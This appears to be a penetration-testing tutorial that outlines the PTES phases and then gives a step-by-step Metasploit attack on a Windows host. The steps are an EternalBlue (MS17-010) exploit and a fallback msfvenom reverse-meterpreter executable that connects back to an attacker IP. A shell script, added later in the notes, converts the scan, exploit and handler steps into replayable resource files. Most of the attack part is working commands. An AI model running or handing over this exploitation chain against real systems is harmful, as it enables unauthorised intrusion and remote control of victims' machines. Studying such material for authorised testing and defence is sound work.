# 1. Phase division:
A penetration test (the PTES phases) is divided into seven stages: pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.
## 1. Pre-engagement interaction:
Discuss with the client organization to agree on the scope, goals, rules of engagement and so on.
This is the stage before intelligence gathering; its main output is a confirmed list of in-scope targets.
## 2. Intelligence gathering stage:
Collect as much information about the target organization as possible:
- Open-source information search - Google and other search engines
- Host discovery and port scanning - Nmap
- Service scanning - the modules under auxiliary/scanner/ in Metasploit, which report service versions and similar details for the target machine
- Network vulnerability scanning - OpenVAS, Nessus, etc.
- Other tools - custom Python scanning scripts
## 3. Threat modeling phase:
Sort through the clues and decide on the most feasible attack path. The documents written in this stage are not only for yourself but for the whole team, so that several people can work together.
This stage is mainly about organizing the collected information and settling on an approach to exploitation.
## 4. Vulnerability analysis stage:
Search for usable exploit code and resources.
This stage mainly selects and matches candidate exploit modules and payloads/shellcode against the services and versions found earlier.
## 5. Exploitation stage:
Find the security hole and break into the system.
At this stage, attempt to exploit the vulnerability: set up the listener (handler) for the reverse connection, then launch the exploit.
## 6. Post-exploitation stage:
Meterpreter; carry out operations on the compromised host.
At this stage, data collection and download, persistence (backdoor maintenance), privilege escalation and similar operations are carried out.
## 7. Report phase:
Penetration test report.
This stage summarizes the engagement. The overview generally covers time, personnel, scope, technical means and so on: the time frame of the test, the people involved and their contact details, the agreed scope, and a description of the techniques and tools used. Then write up each phase clearly: pre-engagement interaction, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, the exploitation results, and security recommendations.
Points to watch while writing: the description of a vulnerability should not be so brief that it is dismissed in a single sentence; in the recommendations section, avoid suggestions with no practical value, such as "strengthen security awareness"; and avoid a chaotic report structure and too much insider jargon, such as "bypassing the dog" (evading the Safedog WAF) or "site X".
# 2. Actual operation (example)
The host range and target have been identified.
## 1. Intelligence gathering
Discover live hosts on the intranet with msf.
Searching for modules:
Enter search scanner type:auxiliary in the msf console (type: filters by module type).
Modules that can be used to discover hosts:
auxiliary/scanner/discovery/arp_sweep # Discover live hosts on the intranet based on ARP
auxiliary/scanner/discovery/udp_sweep # Discover live hosts on the intranet based on UDP
auxiliary/scanner/ftp/ftp_version # Discover FTP services
auxiliary/scanner/http/http_version # Discover HTTP services
auxiliary/scanner/smb/smb_version # Discover live hosts on the intranet based on SMB
Discover live hosts on the intranet based on NetBIOS (e.g. auxiliary/scanner/netbios/nbname)
Discover live hosts on the intranet based on SNMP (e.g. auxiliary/scanner/snmp/snmp_enum)
Discover live hosts on the intranet based on ICMP (a ping sweep, e.g. nmap -sn)
## 2. Threat modeling
---
After the intelligence-gathering step, we discovered the target machine's IP through the ARP sweep.
Then, by scanning that IP, we learned that the target has port 80 open (a web service) and FTP ports open (a file service),
and that SMB is open.
We finally decided to exploit an SMB-related vulnerability.
The alternative is to get in by planting a Trojan horse (a payload executable).
---
## 3. Vulnerability analysis
First, check SMB for exploitable vulnerabilities, such as EternalBlue (MS17-010).
1 Query the msf modules related to EternalBlue
Use the command search ms17_010
2 Then we use the EternalBlue scanner module
use auxiliary/scanner/smb/smb_ms17_010
3 Enter options to see the parameters the scanner module needs
3.1 Then configure rhosts (rhosts is the target host IP or range)
set rhosts <target ip>
4 Then run the scan by entering run
The scanner reports hosts that are likely vulnerable.
## 4. Penetration
---
1 Load the EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue
2 Enter options to see the parameters the exploit module needs
3 Configure them:
3.1 rhosts (the target host IP)
set rhosts <target ip>
3.2 lhost (the listening host, i.e. the attacking machine's IP, which the target must be able to reach)
set lhost <attacker ip>
3.3 lport (the listening port)
set lport <port>
Note that the port must not already be in use on the attacking machine.
4 Then enter run (or exploit) to launch EternalBlue
In our case it failed: the module ran but did not return a session. Before falling back, check that the scanner actually reported the host as vulnerable, that the target OS and architecture are supported by the module, and that the target can reach lhost:lport (no firewall in the way).
![image.png](10-11 msfconsole exploit process.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)
5 Alternative: get in by planting a Trojan horse
---
1 We know the target is a Windows machine, so use msfvenom to generate a Windows payload executable
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
(-p selects a reverse_tcp payload, which connects back from the target to LHOST:LPORT; -e and -i choose the encoder and the number of encoding iterations; -b lists bad characters the encoded payload must avoid)
2 Once the payload is generated, serve it to the target from a simple Python HTTP server
python -m SimpleHTTPServer 80 (Python 2; with Python 3 use python3 -m http.server 80)
3 To set up the listener we use
use exploit/multi/handler
4 Enter options to see the configuration
4.1 Then configure lhost (the listening host, i.e. the attacking machine's IP)
set lhost 192.168.3.33
4.2 Then configure lport (the listening port)
set lport 4446
Note that the port must be the same LPORT that was used when generating the Trojan with msfvenom.
5 Configure the payload
set payload windows/meterpreter/reverse_tcp
6 Run exploit and wait for the target to execute the Trojan
7 The target machine executes the Trojan
The exploit succeeds and we get a meterpreter session.
---
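The script below is an added example, not part of the original notes and not Metasploit's own code. It turns the msfconsole commands typed by hand in the intelligence-gathering, vulnerability-analysis, penetration and fallback-handler steps above into Metasploit resource files (.rc) that can be replayed with msfconsole -q -r, validating the target, LHOST and LPORT values once so that the handler's LPORT cannot drift from the port baked into the msfvenom payload, and checking that the listener port is not already bound (the "port must not be occupied" caveat). The addresses 192.168.3.33 (attacker), 192.168.3.50 (target) and the subnet 192.168.3.0/24 are assumed placeholders; Metasploit does not need to be installed to run the script itself.

```shell
#!/bin/sh
# Added example (not from the original notes): generate Metasploit resource scripts
# for the phases walked through above. Placeholder values (assumptions, change them):
# attacker LHOST 192.168.3.33, target 192.168.3.50, subnet 192.168.3.0/24, LPORT 4446.
# Replay a generated file with:  msfconsole -q -r scan.rc

# Reject anything that is not a dotted-quad IPv4 address (a literal "ip" included).
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# A TCP port is an integer in 1..65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Intelligence gathering: ARP sweep of the subnet, then SMB version probe of the same range.
gen_discovery_rc() {    # $1 = RHOSTS range, e.g. 192.168.3.0/24
    printf '%s\n' \
        'use auxiliary/scanner/discovery/arp_sweep' \
        "set RHOSTS $1" \
        'run' \
        'use auxiliary/scanner/smb/smb_version' \
        "set RHOSTS $1" \
        'run'
}

# Vulnerability analysis: confirm MS17-010 before firing the exploit.
gen_scan_rc() {         # $1 = target IP
    valid_ipv4 "$1" || return 1
    printf '%s\n' \
        'use auxiliary/scanner/smb/smb_ms17_010' \
        "set RHOSTS $1" \
        'run'
}

# Penetration: EternalBlue with a reverse meterpreter back to LHOST:LPORT.
gen_exploit_rc() {      # $1 = target IP, $2 = LHOST, $3 = LPORT
    valid_ipv4 "$1" && valid_ipv4 "$2" && valid_port "$3" || return 1
    printf '%s\n' \
        'use exploit/windows/smb/ms17_010_eternalblue' \
        "set RHOSTS $1" \
        "set LHOST $2" \
        "set LPORT $3" \
        'run'
}

# Fallback: handler for the msfvenom executable. LPORT must equal the port in payload.exe.
gen_handler_rc() {      # $1 = LHOST, $2 = LPORT
    valid_ipv4 "$1" && valid_port "$2" || return 1
    printf '%s\n' \
        'use exploit/multi/handler' \
        'set PAYLOAD windows/meterpreter/reverse_tcp' \
        "set LHOST $1" \
        "set LPORT $2" \
        'set ExitOnSession false' \
        'exploit -j'
}

# The matching msfvenom command, printed rather than executed so this runs without Metasploit.
# Bad characters are passed through %s so printf does not interpret the backslashes.
msfvenom_cmd() {        # $1 = LHOST, $2 = LPORT
    valid_ipv4 "$1" && valid_port "$2" || return 1
    printf 'msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -b %s -i 10 -f exe -o payload.exe\n' \
        "$1" "$2" "'\\x00\\x0a\\xff'"
}

# The listener port must not already be bound locally. Returns 0 when free (or when
# neither ss nor netstat is available, in which case it warns instead of guessing).
port_free() {           # $1 = LPORT
    valid_port "$1" || return 1
    if command -v ss >/dev/null 2>&1; then
        ! ss -Hltn 2>/dev/null | awk '{print $4}' | grep -Eq "[:.]$1\$"
    elif command -v netstat >/dev/null 2>&1; then
        ! netstat -ltn 2>/dev/null | awk '{print $4}' | grep -Eq "[:.]$1\$"
    else
        echo "port_free: no ss/netstat found, cannot verify port $1" >&2
        return 0
    fi
}

# Usage: sh msf_rc.sh write  -> writes discovery.rc, scan.rc, exploit.rc, handler.rc
# and prints the msfvenom command that pairs with handler.rc.
if [ "${1:-}" = "write" ]; then
    LHOST=192.168.3.33  LPORT=4446  TARGET=192.168.3.50  SUBNET=192.168.3.0/24   # placeholders
    port_free "$LPORT" || { echo "LPORT $LPORT is already bound locally" >&2; exit 1; }
    gen_discovery_rc "$SUBNET" > discovery.rc
    gen_scan_rc "$TARGET" > scan.rc
    gen_exploit_rc "$TARGET" "$LHOST" "$LPORT" > exploit.rc
    gen_handler_rc "$LHOST" "$LPORT" > handler.rc    # same $LPORT as the payload below
    msfvenom_cmd "$LHOST" "$LPORT"
fi
```

Because the handler and the msfvenom command are both derived from the same $LPORT variable, the mismatch that silently leaves the listener waiting forever cannot happen; and because each generator validates its inputs, a stray placeholder such as "ip" is rejected before it reaches msfconsole.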
## 5. Post-exploitation
See the separate note on post-exploitation.
## 6. Reporting phase